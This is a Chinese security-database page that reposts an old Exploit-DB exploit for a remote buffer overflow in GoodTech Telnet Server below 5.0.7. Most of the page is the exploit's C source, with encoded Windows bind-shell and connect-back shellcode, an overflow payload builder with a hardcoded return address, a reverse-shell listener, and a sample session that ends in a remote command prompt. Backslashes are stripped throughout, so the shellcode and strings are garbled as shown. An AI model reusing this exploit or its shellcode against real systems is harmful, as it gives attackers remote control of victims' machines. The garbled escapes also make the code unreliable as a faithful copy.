GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)

GoodTech Telnet Server < 5.0.7 – Remote Buffer Overflow (2)

漏洞ID 1055052 漏洞类型
发布时间 2005-04-24 更新时间 2005-04-24
图片[1]-GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)-安全小百科CVE编号 N/A
图片[2]-GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/883
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *
 * cybertronic[at]gmx[dot]net
 *
 * offset fixed!
 *
 * [ cybertronic @ GoodTech ] $ gcc -o goodtech_expl goodtech_expl.c
 * [ cybertronic @ GoodTech ] $ ./goodtech_expl
 *
 * Usage
 * -----
 * [ Bindshell    ] ./goodtech_expl <host>
 * [ Reverseshell ] ./goodtech_expl <host> <connectback ip> <connectback port>
 *
 * [ cybertronic @ GoodTech ] $ ./goodtech_expl 192.168.2.103
 *
 *               __              __                   _
 *   _______  __/ /_  ___  _____/ /__________  ____  (_)____
 *  / ___/ / / / __ / _ / ___/ __/ ___/ __ / __ / / ___/
 * / /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__
 * ___/__, /_.___/___/_/   __/_/   ____/_/ /_/_/___/
 *     /____/
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * --[ connecting to 192.168.2.103:2380...done!
 * --[ jmp esp -> 0x71a17bfb [ws2_32.dll WinXP SP1 GER]
 * --[ sending packet [ 10045 bytes ]...done!
 * --[ sleeping 5 seconds before connecting to 192.168.2.103:4444...
 * --[ connecting to 192.168.2.103:4444...done!
 * --[ b0x pwned - h4ve phun
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:telnetnt>
 * 
 *
 */


#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
 *
 * definitions
 *
 */

#define PORT	2380

#define RED		"E[31mE[1m"
#define GREEN	"E[32mE[1m"
#define YELLOW	"E[33mE[1m"
#define BLUE	"E[34mE[1m"
#define NORMAL	"E[m"

/*
 *
 * prototypes
 *
 */

int exploit ( int s, unsigned long ip, unsigned short cbport, int option );
int shell ( int s, char* tip, unsigned short cbport );

void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
void start_reverse_handler ( char* argv3 );

/*********************
 * Windows Shellcode *
 *********************/
 
/*
 * Type  : bind shellcode
 * Length: 500 bytes
 * Port  : 4444 / 0x115c
 *
 */

unsigned char bindshell[] =
"xebx19x5ex31xc9x81xe9x89xffxffxffx81x36x80xbfx32"
"x94x81xeexfcxffxffxffxe2xf2xebx05xe8xe2xffxffxff"
"x03x53x06x1fx74x57x75x95x80xbfxbbx92x7fx89x5ax1a"
"xcexb1xdex7cxe1xbex32x94x09xf9x3ax6bxb6xd7x9fx4d"
"x85x71xdaxc6x81xbfx32x1dxc6xb3x5axf8xecxbfx32xfc"
"xb3x8dx1cxf0xe8xc8x41xa6xdfxebxcdxc2x88x36x74x90"
"x7fx89x5axe6x7ex0cx24x7cxadxbex32x94x09xf9x22x6b"
"xb6xd7x4cx4cx62xccxdax8ax81xbfx32x1dxc6xabxcdxe2"
"x84xd7xf9x79x7cx84xdax9ax81xbfx32x1dxc6xa7xcdxe2"
"x84xd7xebx9dx75x12xdax6ax80xbfx32x1dxc6xa3xcdxe2"
"x84xd7x96x8exf0x78xdax7ax80xbfx32x1dxc6x9fxcdxe2"
"x84xd7x96x39xaex56xdax4ax80xbfx32x1dxc6x9bxcdxe2"
"x84xd7xd7xddx06xf6xdax5ax80xbfx32x1dxc6x97xcdxe2"
"x84xd7xd5xedx46xc6xdax2ax80xbfx32x1dxc6x93x01x6b"
"x01x53xa2x95x80xbfx66xfcx81xbex32x94x7fxe9x2axc4"
"xd0xefx62xd4xd0xffx62x6bxd6xa3xb9x4cxd7xe8x5ax96"
"x80xaex6ex1fx4cxd5x24xc5xd3x40x64xb4xd7xecxcdxc2"
"xa4xe8x63xc7x7fxe9x1ax1fx50xd7x57xecxe5xbfx5axf7"
"xedxdbx1cx1dxe6x8fxb1x78xd4x32x0exb0xb3x7fx01x5d"
"x03x7ex27x3fx62x42xf4xd0xa4xafx76x6axc4x9bx0fx1d"
"xd4x9bx7ax1dxd4x9bx7ex1dxd4x9bx62x19xc4x9bx22xc0"
"xd0xeex63xc5xeaxbex63xc5x7fxc9x02xc5x7fxe9x22x1f"
"x4cxd5xcdx6bxb1x40x64x98x0bx77x65x6bxd6x93xcdxc2"
"x94xeax64xf0x21x8fx32x94x80x3axf2xecx8cx34x72x98"
"x0bxcfx2ex39x0bxd7x3ax7fx89x34x72xa0x0bx17x8ax94"
"x80xbfxb9x51xdexe2xf0x90x80xecx67xc2xd7x34x5exb0"
"x98x34x77xa8x0bxebx37xecx83x6axb9xdex98x34x68xb4"
"x83x62xd1xa6xc9x34x06x1fx83x4ax01x6bx7cx8cxf2x38"
"xbax7bx46x93x41x70x3fx97x78x54xc0xafxfcx9bx26xe1"
"x61x34x68xb0x83x62x54x1fx8cxf4xb9xcex9cxbcxefx1f"
"x84x34x31x51x6bxbdx01x54x0bx6ax6dxcaxddxe4xf0x90"
"x80x2fxa2x04";

/*
 * Type  : connect back shellcode
 * Length: 316 bytes
 * CBIP  : reverseshell[111] ( ^ 0x99999999 )
 * CBPort: reverseshell[118] ( ^ 0x9999 )
 *
 */

unsigned char reverseshell[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";

/*
 *
 * functions
 *
 */

int
exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )
{
	char buffer[10046];
	
	printf ( "--[ jmp esp -> 0x71a17bfb [ws2_32.dll WinXP SP1 GER]n" );
	if ( option == 0 )
	{
		memcpy ( &reverseshell[111], &xoredip, 4);
		memcpy ( &reverseshell[118], &xoredcbport, 2);

		bzero ( &buffer, sizeof ( buffer ) );
		memset ( buffer, 0x41, 10032 );
		memcpy ( buffer + 46, "x81xc4x54xf2xffxff", 6 );
		memcpy ( buffer + 52, reverseshell, sizeof ( reverseshell ) - 1 );
		strcat ( buffer, "xfbx7bxa1x71" ); // jmp esp ws2_32.dll WinXP SP1 GER
		strncat ( buffer, "xe9xf0xd8xffxff", 5 ); // jmp -10000
		strcat ( buffer, "rnrn");
	}
	else
	{
		bzero ( &buffer, sizeof ( buffer ) );
		memset ( buffer, 0x41, 10032 );
		memcpy ( buffer + 46, "x81xc4x54xf2xffxff", 6 );
		memcpy ( buffer + 52, bindshell, sizeof ( bindshell ) - 1 );
		strcat ( buffer, "xfbx7bxa1x71" ); // jmp esp ws2_32.dll WinXP SP1 GER
		strncat ( buffer, "xe9xf0xd8xffxff", 5 ); // jmp -10000
		strcat ( buffer, "rnrn");
	}

	printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );

	if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
	{
		printf ( RED "failed!n" NORMAL);
		return ( 1 );
	}
	printf ( YELLOW "done!n" NORMAL);
	sleep ( 1 );
	close ( s );
	return ( 0 );
}

int
shell ( int s, char* tip, unsigned short cbport )
{
	int n;
	char buffer[2048];
	fd_set fd_read;

	printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "n" );

	FD_ZERO ( &fd_read );
	FD_SET ( s, &fd_read );
	FD_SET ( 0, &fd_read );

	while ( 1 )
	{
		FD_SET ( s, &fd_read );
		FD_SET ( 0, &fd_read );

		if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
			break;
		if ( FD_ISSET ( s, &fd_read ) )
		{
			if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
			{
				printf ( "bye bye...n" );
				return;
			}
			if ( write ( 1, buffer, n ) < 0 )
			{
				printf ( "bye bye...n" );
				return;
			}
		}
		if ( FD_ISSET ( 0, &fd_read ) )
		{
			if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
			{
				printf ( "bye bye...n" );
				return;
			}
			if ( send ( s, buffer, n, 0 ) < 0 )
			{
				printf ( "bye bye...n" );
				return;
			}
		}
		usleep(10);
	}
}

void
connect_to_bindshell ( char* tip, unsigned short bport )
{
	int s;
	int sec = 5; // change this for fast targets
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

	if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
	{
		fprintf ( stderr, "cannot resolve "%s"n", tip );
		exit ( 1 );
	}

	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( bport );

	if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!n" );
		exit ( 1 );
	}
	printf ("--[ sleeping %d seconds before connecting to %s:%u...n", sec, tip, bport );
	wait ( sec );
	printf ( "--[ connecting to %s:%u...", tip, bport );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( RED "failed!n" NORMAL);
		exit ( 1 );
	}
	printf ( YELLOW "done!n" NORMAL);
	shell ( s, tip, bport );
}

void
header ()
{
	printf ( "              __              __                   _           n" );
	printf ( "  _______  __/ /_  ___  _____/ /__________  ____  (_)____      n" );
	printf ( " / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/  n" );
	printf ( "/ /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__        n" );
	printf ( "\___/\__, /_.___/\___/_/   \__/_/   \____/_/ /_/_/\___/  n" );
	printf ( "    /____/                                                     nn" );
	printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]netn" );
}

void
start_reverse_handler ( char* argv3 )
{
	int s1, s2;
	unsigned short cbport;
	struct sockaddr_in cliaddr, servaddr;
	socklen_t clilen = sizeof ( cliaddr );

	sscanf ( argv3, "%u", &cbport );
	
	bzero ( &servaddr, sizeof ( servaddr ) );
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
	servaddr.sin_port = htons ( cbport );

	printf ( "--[ starting reverse handler [port: %u]...", cbport );
	if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
	{
		printf ( "socket failed!n" );
		exit ( 1 );
	}
	bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
	if ( listen ( s1, 1 ) == -1 )
	{
		printf ( "listen failed!n" );
		exit ( 1 );
	}
	printf ( YELLOW "done!n" NORMAL);
	if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
	{
		printf ( "accept failed!n" );
		exit ( 1 );
	}
	close ( s1 );
	printf ( "--[ incomming connection from:t" YELLOW " %sn" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
	shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
	close ( s2 );
}

void
wait ( int sec )
{
	sleep ( sec );
}

int
main ( int argc, char* argv[] )
{

	int s;
	unsigned long xoredip;
	unsigned short xoredcbport;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

	if ( argc != 2 )
		if ( argc != 4 )
		{
			fprintf ( stderr, "nUsagen-----n[ Bindshell    ] %s <host>n[ Reverseshell ] %s <host> <connectback ip> <connectback port>nn", argv[0], argv[0] );
			exit ( 1 );
		}

	if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
	{
		fprintf ( stderr, "cannot resolve "%s"n", argv[1] );
		exit ( 1 );
	}
	remote_addr.sin_family = AF_INET;
	remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
	remote_addr.sin_port   = htons ( PORT );

	system ( "clear" );
	header ();

	if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!n" );
		exit ( 1 );
	}

	printf ( "--[ connecting to %s:%u...", argv[1], PORT  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!n" );
		exit ( 1 );
	}
	printf ( YELLOW "done!n" NORMAL);
	
	if ( argc == 4 )
	{
		xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
		xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
		if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 )
		{
			printf ( "exploitation FAILED!n" );
			exit ( 1 );
		}
		start_reverse_handler ( argv[3] );
	}
	else
	{
		if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )
		{
			printf ( "exploitation FAILED!n" );
			exit ( 1 );
		}
		connect_to_bindshell ( argv[1], 4444 );
	}
}

// milw0rm.com [2005-04-24]

相关推荐: PHP Nuke Forged User Info Cookie Vulnerability

PHP Nuke Forged User Info Cookie Vulnerability 漏洞ID 1103511 漏洞类型 Input Validation Error 发布时间 2001-02-12 更新时间 2001-02-12 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享